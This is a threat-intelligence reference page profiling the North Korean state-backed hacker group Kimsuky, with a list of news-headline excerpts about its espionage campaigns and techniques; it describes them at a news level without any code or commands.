Kimsuky

Kimsuky, also known as Velvet Chollima and Black Banshee, is a North Korean state-backed hacker group. The group has been active since at least 2012 and initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields. Their targets include South Korean think tanks, industry, nuclear power operators, and the South Korean Ministry of Unification for espionage purposes. In recent years, Kimsuky has expanded their operations to include states such as Russia, the United States, and European nations. Kimsuky has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions. They have been involved in several notable campaigns, including the 2014 Korea Hydro & Nuclear Power Co. compromise, Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). It’s important to note that Kimsuky is thought to be behind a wave of attacks attempting to steal victims’ personal information, IDs, passwords, as well as cryptocurrency.

Cyber News related to Kimsuky

Kimsuky APT Targets South Korean Androids, Abuses KakaoTalk for Espionage - The Kimsuky advanced persistent threat (APT) group has been actively targeting South Korean Android users by exploiting the popular messaging app KakaoTalk to conduct espionage activities. This campaign highlights the evolving tactics of Kimsuky, ...
1 month ago Darkreading.com Kimsuky

Kimsuky HTTPtroy Backdoor Targets South Korea Users - The Kimsuky threat group has deployed a new HTTPtroy backdoor targeting users in South Korea, highlighting a sophisticated cyber espionage campaign. This malware enables attackers to maintain persistent access and exfiltrate sensitive data from ...
2 months ago Darkreading.com Kimsuky

Kimsuky and Lazarus Hacker Groups Unveil New Tools - The notorious North Korean hacker groups Kimsuky and Lazarus have recently unveiled new cyber tools, escalating their threat capabilities in the global cybersecurity landscape. These groups, known for their sophisticated cyber espionage and ...
2 months ago Cybersecuritynews.com CVE-2023-28252 CVE-2023-4863 Kimsuky Lazarus

Kimsuky Hackers Deploy Weaponized LNK File in Latest Espionage Campaign - Kimsuky, a notorious North Korean hacker group, has been observed deploying a weaponized LNK file in their latest cyber espionage campaign. This attack vector leverages malicious shortcut files to execute payloads stealthily on targeted systems, ...
3 months ago Cybersecuritynews.com Kimsuky

Exposed Kim Dump Exposes Kimsuky Hackers - The recent leak known as the "Exposed Kim Dump" has unveiled critical insights into the operations of the Kimsuky hacker group, a notorious North Korean cyber espionage entity. This dump includes a wealth of data that sheds light on Kimsuky's ...
3 months ago Cybersecuritynews.com Kimsuky

Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines - Cyber Security News - The attackers impersonate legitimate entities, including government officials, news correspondents, and security personnel, to establish trust before delivering malicious payloads through encrypted archives or deceptive websites designed to mimic ...
6 months ago Cybersecuritynews.com Kimsuky

ClickFix Attack Emerges by Over 500% - Hackers Actively Using This Technique to Trick Users - The attack presents victims with fake error messages or verification prompts that appear legitimate, instructing them to copy and paste seemingly harmless commands to resolve fictitious technical issues. Unlike traditional attack methods, ClickFix ...
6 months ago Cybersecuritynews.com Kimsuky Lazarus Group MuddyWater APT3

Lumma Stealer Evolves with New PowerShell Tools & Advanced Techniques - “The variations we saw in Lumma Stealer behavior are significant to defenders,” noted the Sophos Managed Detection and Response team in their report, emphasizing that these delivery techniques could easily be adapted for other malware ...
7 months ago Cybersecuritynews.com Kimsuky

Kimsuky Hacker Group Employs New Phishing Tactics & Malware Infections - The group, known for targeting government entities, think tanks, and individuals related to foreign policy and national security, has enhanced its technical capabilities with multi-stage attack chains designed to evade detection while extracting ...
7 months ago Cybersecuritynews.com Kimsuky

Kimusky Hackers Exploiting RDP & MS Office Vulnerabilities in Targeted Attacks - A sophisticated Advanced Persistent Threat (APT) operation named Larva-24005, linked to the notorious Kimsuky threat group, has been discovered actively exploiting critical vulnerabilities in Remote Desktop Protocol (RDP) and Microsoft Office ...
8 months ago Cybersecuritynews.com Equation Kimsuky CVE-2019-0708

State-sponsored hackers embrace ClickFix social engineering tactic - Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up. ClickFix attacks are gaining ...
8 months ago Bleepingcomputer.com APT28 Kimsuky MuddyWater

State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns - While currently limited to experimental usage by these state-sponsored groups, the increasing popularity of ClickFix in both cybercrime and espionage campaigns suggests the technique will likely become more widely adopted as threat actors continue to ...
8 months ago Cybersecuritynews.com Kimsuky MuddyWater

Lazarus Group is No Longer Consider a Single APT Group, But Collection of Many Sub Groups - The cybersecurity landscape is witnessing a growing complexity in the attribution of Advanced Persistent Threat (APT) actors, particularly the North Korean-linked Lazarus group. For instance, Bureau325 and APT43 have been identified as entities that ...
9 months ago Cybersecuritynews.com Kimsuky Lazarus Group

North Korean Kimsuky Hackers New Tactics & Malicious Scripts in Latest Attacks - The attack’s initial payload consists of four files: a heavily obfuscated VBScript (1.vbs), a PowerShell script (1.ps1), and two encoded text files (1.log and 2.log) that contain the actual malware components. Cyber Security News is a Dedicated ...
9 months ago Cybersecuritynews.com Kimsuky

New Windows zero-day exploited by 11 state hacking groups since 2017 - The Windows zero-day, tracked as ZDI-CAN-25373, is caused by a User Interface (UI) Misrepresentation of Critical Information (CWE-451) weakness, which allows attackers to exploit how Windows displays shortcut (.lnk) files to evade detection and ...
9 months ago Bleepingcomputer.com Mustang Panda CVE-2024-43461 APT37 BITTER Kimsuky Sidewinder APT3

Beware of North Korean Hackers DocSwap Malware Disguised As Security Document Viewer - “The malicious app performs an XOR (0xCC) operation on the ‘security.db’ file in a subdirectory, which drops an APK file and loads the DEX file stored within it,” explained the report detailing the threat. A sophisticated ...
9 months ago Cybersecuritynews.com Kimsuky

Hackers Using Advanced Social Engineering Techniques With Phishing Attacks - ESET’s APT Activity Report shows that the North Korea-aligned threat actors have significantly refined their tactics, making traditional security advice like “don’t click suspicious links” increasingly inadequate as attacks ...
9 months ago Cybersecuritynews.com Kimsuky Lazarus Group

North Korean Hackers Using Dropbox & PowerShell Scripts To Infiltrate Organizations - Dubbed ‘DEEP#DRIVE’ by researchers at Securonix, the operation leverages phishing lures, obfuscated PowerShell scripts, and Dropbox’s infrastructure to bypass security defenses and exfiltrate sensitive data. A coordinated cyber ...
10 months ago Cybersecuritynews.com Kimsuky

North Korea's Kimsuky Attacks Rivals' Trusted Platforms - North Korea-linked threat groups are increasingly using living-off-the-land (LotL) techniques and trusted services to evade detection, with a recent Kimsuky campaign showcasing the use of PowerShell scripts and storing data in Dropbox folders, along ...
10 months ago Darkreading.com Andariel Kimsuky

DPRK hackers dupe targets into typing PowerShell commands as admin - Microsoft says it observed this tactic in limited-scope attacks starting January 2025, targeting individuals that work in international affairs organizations, NGOs, government agencies, and media companies across North America, South America, ...
10 months ago Bleepingcomputer.com Kimsuky

Andariel Hacking Group Shifts Focus to Financial Attacks on U.S. Organizations - In July 2024, a North Korean military intelligence operative part of the Andariel group was indicted by the U.S. Department of Justice (DoJ) for allegedly carrying out ransomware attacks against healthcare facilities in the country and using the ...
1 year ago Thehackernews.com Andariel Kimsuky

North Korea-linked APT Kimsuky targeted German defense firm Diehl Defence - North Korea-linked APT group Kimsuky has been linked to a cyberattack on Diehl Defence, a defense firm specializing in the production of advanced military systems. “Researchers from Mandiant, a Google subsidiary, uncovered and analyzed a ...
1 year ago Securityaffairs.com Kimsuky

Microsoft links North Korean hackers to new FakePenny ransomware - Microsoft has linked a North Korean hacking group it tracks as Moonstone Sleet to FakePenny ransomware attacks, which have led to millions of dollars in ransom demands. While this threat group's tactics, techniques, and procedures largely overlapped ...
1 year ago Bleepingcomputer.com Kimsuky Lazarus Group LockBit Ransomhub

North Korean Hacker Group Kimsuky Deploys New Linux Malware 'Gomir' via Trojanized Software Installers - Kimsuky, linked to North Korea's military intelligence, the Reconnaissance General Bureau, has a history of sophisticated cyber attacks aimed primarily at South Korean entities. In early February 2024, researchers at SW2, a threat intelligence ...
1 year ago Cysecurity.news Kimsuky